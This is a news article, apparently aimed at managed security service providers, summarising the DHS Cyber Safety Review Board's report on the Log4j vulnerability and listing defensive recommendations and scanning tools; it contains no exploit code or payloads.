Log4j represents an "endemic vulnerability" that continues to pose a significant risk to organizations across the United States, according to a new report from the U.S. Department of Homeland Security (DHS) Cyber Safety Review Board (CSRB).
Key takeaways from the report include:
- Many organizations struggled to respond to Log4j attacks and have still not fully patched vulnerable instances.
- Software developers, maintainers, vulnerability response teams and the U.S. government frequently made risk trade-offs regarding software use and integration.
- Log4j attacks highlighted "fundamental adoption gaps" in organizations' vulnerability response practices and cybersecurity hygiene.
- The vulnerability could have been prevented or caught earlier, but the resources to do so were not available to the developers who led the Java Naming and Directory Interface (JNDI) open-source project in 2013. Cybercriminals can exploit JNDI to download malicious applications into Java applications and execute remote code.
The Log4j event "is not over," CSRB pointed out. However, with the right approach, organizations can guard against Log4j attacks and similar threats.
CSRB Offers Log4j Attack Recommendations
In its report, CSRB provided the following to help organizations protect against Log4j attacks, including:
- Look for vulnerable software and upgrade it as needed.
- Report any malicious activities that indicate Log4j attacks may be underway.
- Invest in security tools that can be used to identify and respond to Log4j attacks.
- Develop and maintain an accurate IT asset and application inventory.
- Establish a vulnerability response program.
- Create a vulnerability disclosure and handling process.
CSRB continues to explore opportunities to help organizations optimize their cybersecurity. It has proposed creating a baseline requirement for software transparency for federal government vendors. In addition, CSRB may evaluate the efficacy of using a cyber safety reporting system and the feasibility of creating a software security risk assessment center of excellence.
Log4j Security Tools Available to MSSPs
MSSPs can use several security tools to protect themselves and their customers against Log4j attacks, such as:
- Open-Source Search Tool: Cybersecurity experts Beau Woods and Adam Bregenzer in January 2022 released an open-source search tool to help cybersecurity professionals find software products impacted by the Log4j vulnerability.
- Community Shield Dashboard: Network security company Calyptix Security in January 2022 launched the Community Shield dashboard to protect organizations against cybercriminals attempting to identify and exploit the Log4j vulnerability. The dashboard has tracked over 4,000 unique IP addresses attacking organizations through Log4j reconnaissance and exploitation attempts.
- Log4j Scanners: Various Log4j scanners have been released to help organizations detect the Log4j vulnerability.
MSSPs can teach their customers about Log4j and the risks associated with it. They also can provide their customers with security services to combat Log4j attacks and other cyber threats.